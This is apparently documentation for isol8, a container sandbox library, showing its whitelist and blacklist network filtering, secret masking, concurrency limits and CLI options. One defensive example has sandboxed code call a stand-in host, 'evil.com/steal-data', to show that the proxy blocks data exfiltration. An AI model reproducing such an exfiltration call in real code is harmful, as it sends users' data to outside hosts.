When you need to run user-provided code that accesses the internet, isol8’s filtered network mode lets you control exactly which hosts are reachable. This is useful for platforms that allow users to fetch data from approved APIs without giving them unrestricted network access.

Filtered Network Mode

Allow access only to specific domains:
import { DockerIsol8 } from "isol8";

const isol8 = new DockerIsol8({
  mode: "ephemeral",
  network: "filtered",
  networkFilter: {
    whitelist: [
      "^api\\.github\\.com$",
      "^api\\.openai\\.com$",
      "^.*\\.wikipedia\\.org$",
    ],
  },
  memoryLimit: "512m",
  timeoutMs: 30000,
});

await isol8.start();
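
Whitelist entries are regular expressions matched against the destination hostname. The matching idea can be sketched in plain TypeScript (the `isAllowed` helper below is an illustration of the semantics, not isol8's actual proxy code):

```typescript
// Hypothetical helper: does a hostname match any whitelist pattern?
// isol8's proxy performs the real check; this only mirrors the idea.
function isAllowed(hostname: string, whitelist: string[]): boolean {
  return whitelist.some((pattern) => new RegExp(pattern).test(hostname));
}

const whitelist = [
  "^api\\.github\\.com$",
  "^api\\.openai\\.com$",
  "^.*\\.wikipedia\\.org$",
];

console.log(isAllowed("api.github.com", whitelist));   // true
console.log(isAllowed("en.wikipedia.org", whitelist)); // true
console.log(isAllowed("evil.com", whitelist));         // false
```

Note that the patterns are anchored with `^` and `$`, so `api.github.com.evil.com` would not slip through the first pattern.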

Fetching API Data

Let user code call approved APIs:
const result = await isol8.execute({
  code: `
import urllib.request, json

# This works — api.github.com is whitelisted
url = "https://api.github.com/repos/Illusion47586/isol8"
resp = urllib.request.urlopen(url)
data = json.loads(resp.read())
print(f"Stars: {data['stargazers_count']}")
print(f"Language: {data['language']}")
`,
  runtime: "python",
});

console.log(result.stdout);
// Stars: 42
// Language: TypeScript
Requests to non-whitelisted hosts are blocked by the proxy:
const result = await isol8.execute({
  code: `
import urllib.request
# This fails — evil.com is not whitelisted
try:
    urllib.request.urlopen("https://evil.com/steal-data")
except Exception as e:
    print(f"Blocked: {e}")
`,
  runtime: "python",
});
// Blocked: HTTP Error 403: Forbidden

Web Scraping with Packages

Install scraping libraries on the fly:
const result = await isol8.execute({
  code: `
import requests
from bs4 import BeautifulSoup

resp = requests.get("https://en.wikipedia.org/wiki/Docker_(software)")
soup = BeautifulSoup(resp.text, "html.parser")

# Extract the first paragraph
first_p = soup.select_one(".mw-parser-output > p:not(.mw-empty-elt)")
print(first_p.get_text()[:500])
`,
  runtime: "python",
  installPackages: ["requests", "beautifulsoup4"],
});

Node.js API Calls

JavaScript user code can call the same approved APIs; this example uses the Bun runtime for its built-in fetch:
const result = await isol8.execute({
  code: `
const resp = await fetch("https://api.github.com/repos/Illusion47586/isol8");
const data = await resp.json();
console.log(JSON.stringify({
  name: data.full_name,
  description: data.description,
  stars: data.stargazers_count,
}, null, 2));
`,
  runtime: "bun", // Bun has built-in fetch
});

Blacklist Mode

Instead of whitelisting specific hosts, block known-bad domains:
const isol8 = new DockerIsol8({
  mode: "ephemeral",
  network: "filtered",
  networkFilter: {
    blacklist: [
      ".*\\.ru$",            // Block all .ru domains
      ".*\\.cn$",            // Block all .cn domains
      "^malware\\..*",       // Block malware.* domains
      ".*crypto.*",          // Block anything with "crypto"
    ],
  },
});
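
Blacklist patterns use the same regex-over-hostname semantics: any match blocks the request. A quick self-contained illustration of what the patterns above catch (the `isBlocked` helper and sample hostnames are assumptions for the demo, not isol8 internals):

```typescript
// Hypothetical helper mirroring blacklist matching; isol8's proxy does the real check.
function isBlocked(hostname: string, blacklist: string[]): boolean {
  return blacklist.some((pattern) => new RegExp(pattern).test(hostname));
}

const blacklist = [".*\\.ru$", ".*\\.cn$", "^malware\\..*", ".*crypto.*"];

console.log(isBlocked("mirror.yandex.ru", blacklist));  // true  (.ru suffix)
console.log(isBlocked("cryptocompare.com", blacklist)); // true  ("crypto" substring)
console.log(isBlocked("api.github.com", blacklist));    // false
```

Because `.*crypto.*` is an unanchored substring match, it also catches subdomains like `crypto.example.com`; prefer anchored patterns when you want precision.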

Combining Secrets with Network Access

Safely call authenticated APIs without leaking credentials:
const isol8 = new DockerIsol8({
  mode: "ephemeral",
  network: "filtered",
  networkFilter: {
    whitelist: ["^api\\.openai\\.com$"],
  },
  secrets: {
    OPENAI_API_KEY: "sk-proj-abc123...",
  },
});

await isol8.start();

const result = await isol8.execute({
  code: `
import os, json, urllib.request

req = urllib.request.Request(
    "https://api.openai.com/v1/chat/completions",
    data=json.dumps({
        "model": "gpt-4o-mini",
        "messages": [{"role": "user", "content": "Say hello in 3 words"}],
    }).encode(),
    headers={
        "Authorization": f"Bearer {os.environ['OPENAI_API_KEY']}",
        "Content-Type": "application/json",
    },
)
resp = urllib.request.urlopen(req)
data = json.loads(resp.read())
print(data["choices"][0]["message"]["content"])
`,
  runtime: "python",
});

// The API key is masked if it accidentally appears in output
console.log(result.stdout);
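
Conceptually, masking is a substitution pass over captured output before it reaches you. A minimal sketch of that idea, assuming a simple placeholder string; this is an illustration, not isol8's actual implementation:

```typescript
// Hypothetical: replace every occurrence of each secret value with a placeholder.
// The "[REDACTED]" text is an assumption for the demo.
function maskSecrets(output: string, secrets: Record<string, string>): string {
  let masked = output;
  for (const value of Object.values(secrets)) {
    masked = masked.split(value).join("[REDACTED]");
  }
  return masked;
}

const raw = "key is sk-proj-abc123 and response is Hello there friend";
console.log(maskSecrets(raw, { OPENAI_API_KEY: "sk-proj-abc123" }));
// key is [REDACTED] and response is Hello there friend
```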

Rate Limiting External Requests

Use isol8’s concurrency semaphore to limit how many requests go out simultaneously:
// isol8.config.json
// { "maxConcurrent": 3 }  // Only 3 containers can run at once

// Each execution makes one outbound request, so capping containers also caps concurrent external calls
const urls = [
  "https://api.github.com/repos/denoland/deno",
  "https://api.github.com/repos/oven-sh/bun",
  "https://api.github.com/repos/nodejs/node",
  "https://api.github.com/repos/python/cpython",
];

const results = await Promise.all(
  urls.map((url) =>
    isol8.execute({
      code: `
import urllib.request, json
data = json.loads(urllib.request.urlopen("${url}").read())
print(json.dumps({"name": data["full_name"], "stars": data["stargazers_count"]}))
`,
      runtime: "python",
    })
  )
);

// Only 3 run at a time due to maxConcurrent
const repos = results.map((r) => JSON.parse(r.stdout));
console.log(repos);
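
The semaphore behind maxConcurrent can be modeled in a few lines of TypeScript; this is a simplified sketch of the scheduling idea, not isol8's scheduler:

```typescript
// Hypothetical counting semaphore: at most `limit` tasks run concurrently.
class Semaphore {
  private waiters: (() => void)[] = [];
  private active = 0;

  constructor(private limit: number) {}

  async run<T>(task: () => Promise<T>): Promise<T> {
    // Wait until a slot frees up.
    while (this.active >= this.limit) {
      await new Promise<void>((resolve) => this.waiters.push(resolve));
    }
    this.active++;
    try {
      return await task();
    } finally {
      this.active--;
      this.waiters.shift()?.(); // Wake one waiter, if any.
    }
  }
}

// Usage: with a limit of 3, the fourth task starts only after one finishes.
const sem = new Semaphore(3);
const tasks = [1, 2, 3, 4].map((n) =>
  sem.run(async () => {
    await new Promise((r) => setTimeout(r, 50));
    return n;
  })
);
console.log(await Promise.all(tasks)); // [ 1, 2, 3, 4 ]
```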

CLI Examples

# Fetch from an allowed API
isol8 run -e "
import urllib.request, json
data = json.loads(urllib.request.urlopen('https://api.github.com').read())
print(json.dumps(data, indent=2))
" --runtime python --net filtered --allow "^api\.github\.com$"

# Scrape a website
isol8 run scraper.py --net filtered \
  --allow "^en\.wikipedia\.org$" \
  --install requests --install beautifulsoup4

# Full network access (use with caution)
isol8 run script.py --net host